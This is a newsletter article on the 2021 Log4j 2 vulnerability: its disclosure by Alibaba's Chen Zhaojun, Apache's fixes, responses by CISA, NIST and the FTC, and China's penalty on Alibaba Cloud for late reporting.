The open source software community and government agencies rush to contain a novel Log4j 2 vulnerability
On November 24, 2021, Chen Zhaojun (Chen) of the Alibaba Cloud Security Team alerted the Apache Software Foundation (ASF) about a Log4j 2 vulnerability that could allow knowledgeable threat actors to hijack computer systems running Log4j 2. Inside the Race to Fix a Potentially Disastrous Software Flaw (Bloomberg), available here.
Log4j 2 is a programming framework (prepackaged set of code that is used by programmers) used to record certain events from targeted systems. Log4j 2 is based on its predecessor, Log4j 1.X, and offers certain enhanced features for programmers. On August 5, 2015, Log4j 2 became the primary version utilized in software development as all other previous versions became obsolete. Currently, this framework is widely used in web-based software applications.
To explain what Log4j 2 does, think about Event Data Recorders (EDRs) (commonly known as a “black box”), which are found on automobiles and airplanes. Vehicle manufacturers install third-party EDRs to delegate the task of recording data generated by the vehicle (for instance, speed and location). In the same way, program developers delegate program-logging features to third-party programming frameworks, such as Log4j 2. Log4j 2 is considered one of the most commonly used frameworks. Log4shell by the numbers- Why did CVE-2021-44228 set the Internet on Fire?, available here. In fact, it is even used by the Ingenuity helicopter on the Mars rover! Did you know that Ingenuity, the Mars 2020 Helicopter mission, is powered by Apache Log4j? (Twitter), original page deleted but the archived page available here.
The Log4j 2 vulnerability identified by Chen could allow a threat actor to send a carefully crafted message to a server running a susceptible Log4j 2 component to eventually install and run other programs without authorization. In essence, this vulnerability bypasses other system security mechanisms and allows threat actors to control vulnerable systems.
After verifying Chen’s claims, the ASF began creating a software fix to address the framework’s exposure. In the meantime, on December 8, 2021, Chen contacted the ASF again, this time alerting them that the Log4j 2 vulnerability was revealed on a Chinese blogging platform, and “[s]ome WeChat security chat groups are already discussing the details of the vulnerability, and some security researchers already have the vulnerability.” Inside the Race to Fix a Potentially Disastrous Software Flaw (Bloomberg), supra. Chen promised not to disclose the vulnerability until the ASF could publicly release an appropriate fix. Chen impressed on the ASF the need to “[p]lease hurry up.” Id.
Soon thereafter, the ASF published multiple software updates to resolve the vulnerability, although security researchers have identified issues with previously published fixes. Log4j Zero-Day Vulnerability Response (Center for Internet Security), available here. The Center for Internet Security expects a continuous stream of fixes before this vulnerability is completely mitigated. Id.
According to Matthew Prince, co-founder and CEO of Cloudflare (a U.S.-based web infrastructure and security company), the earliest known instance of this vulnerability being exploited was on December 1, 2021. Matthew Prince’s Tweet (Twitter), available here. Similarly, a proof of concept for exploiting this vulnerability was posted as early as December 9, 2021. CVE-2021-44228(Apache Log4j Remote Code Execution), original page deleted but the archived page available here.
In response to the Log4j 2 vulnerability, the Cybersecurity and Infrastructure Security Agency (CISA) of the U.S. Department of Homeland Security published its Log4j Scanner that allows system administrators to determine whether their systems are potentially affected by the vulnerability. Log4j Scanner (GitHub), available here. Also, the National Institute of Standards and Technology (NIST) of the U.S. Department of Commerce has been continuously tracking the vulnerability via its National Vulnerability Database. CVE-2021-44228, available here. Finally, on January 4, 2022, the Federal Trade Commission (FTC) announced its intentions “to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities.” FTC warns companies to remediate Log4j security vulnerability, available here. Under the Federal Commission Act and the Gramm Leach Bliley Act, companies have legal obligations to take reasonable steps to mitigate known software vulnerabilities that can cause “loss or breach of personal information, financial loss, and other irreversible harms.” Id. In the past, the FTC has pursued companies, such as Equifax, for failing to reasonably secure sensitive consumer personal information. Equifax to Pay $575 Million as Part of Settlement with FTC, CFPB, and States Related to 2017 Data Breach, available here.
While CISA and other companies have released tools that check for Log4j 2 vulnerabilities in systems, these tools are not easy to use for non-technical users. Because Log4j 2 is akin to an internal component of a complex machine, this vulnerability cannot be manually patched by consumers who may be using programs that use the vulnerable Log4j 2 code. As such, consumers should patch any software updates from developers because those updates may fix any issues stemming from the Log4j 2 vulnerability. Thus, it is up to software developers to determine whether their published programs are vulnerable to this exploit, and patch this vulnerability promptly to prevent users’ systems from being compromised by it.
Although Chen is credited with, and widely praised for, discreetly revealing the vulnerability to the ASF, China’s Cyber Security Administration of the Ministry of Industry and Information Technology (MIIT) penalized Chen’s employer, Alibaba Cloud Computing (a China-based cloud computing service company), for failing to promptly report it to Chinese government authorities. 独家丨阿里云被暂停工信部网络安全威胁信息共享平台合作单位 [Exclusive丨Alibaba Cloud is suspended from the Ministry of Industry and Information Technology's cybersecurity threat information sharing platform cooperation unit], available here. It is understood that under Article 2 of the Provision on Security Loopholes of Network Products (a cybersecurity governmental regulation of China), network product providers are obligated to report vulnerability information to the MIIT’s Cyber Security Threat and Vulnerability Information sharing platform within two days of discovery. 网络产品安全漏洞管理规定 (Regulations on the Management of Security Vulnerabilities in Network Products), available here. Although Chen reportedly knew of the Log4j 2 vulnerability as early as November 24, allegedly, MIIT was first notified of the vulnerability by an unnamed network security professional organization on December 9, 2021. 关于阿帕奇Log4j2组件重大安全漏洞的网络安全风险提示 (中华人民共和国工业和信息化部) [Cybersecurity risk tips on major security vulnerabilities in Apache Log4j2 components (Ministry of Industry and Information Technology of the People's Republic of China)], available here. Consequently, Alibaba Cloud Computing’s cybersecurity partnership with the MITT was suspended for six months.
Analysis
Despite providing useful event-logging features to programmers, Log4j 2 has historically suffered from vulnerabilities that allowed threat actors to execute unauthorized code on targeted servers. The common cause of previous vulnerabilities involved the exploitation of Log4j 2’s feature of accepting external data sources for logging purposes. Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated Dec. 28) (Palo Alto Networks – Unit 42), available here. By carefully crafting and feeding a malicious data stream to a server using Log4j 2, security analysts were able to induce Log4j 2 to behave in unexpected ways that could be exploited for infiltration purposes. See, e.g., CVE-2017-5645 (NIST), available here; CVE-2019-17571 (NIST), available here.
Unlike other software vulnerabilities, Log4j 2 vulnerability is unique due to the widespread use of this software component. Researchers have been able to identify various web services, including certain versions of Minecraft servers (a popular server used to host the game Minecraft), being vulnerable to this exploit. See Log4jAttackSurface (GitHub), available here. The widespread implication of this vulnerability has led some to label this exploit as a “cluster bomb of zero days.” CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE) (YouTube), available here. Fortunately, both CISA and NIST have provided up-to-date resources to document this vulnerability for the cybersecurity community. Furthermore, the FTC’s announcement on Log4j 2 remediation requirements serves as an effective measure to encourage companies to investigate and mitigate this vulnerability. Also, the ASF has been active in providing Log4j 2 updates to mitigate the vulnerability.
Finally, Chen deserves much credit for withholding information except from those who may have the best ability to resolve this issue for everyone. Public disclosure of novel cybersecurity vulnerabilities without appropriate remedies in place risks creating more opportunities for threat actors exploiting them before systems could develop or apply remedial solutions. Chen’s action demonstrates the goodwill and global cooperative nature of security professionals across national boundaries. It is likely that Chen acted on his own volition to handle his vulnerability discovery for the sake of the global open source community. As a result, the potential damage resulting from this vulnerability was highly mitigated, even though Chen’s employer was reprimanded for violating China’s cybersecurity vulnerability disclosure regulation.
*This newsletter would especially like to recognize Zeyi Yang of Protocol, an online publication, for the thorough references to Chinese news sources and official legal references in his article. Beijing punishes Alibaba for not reporting Log4j loophole fast enough, supra.
|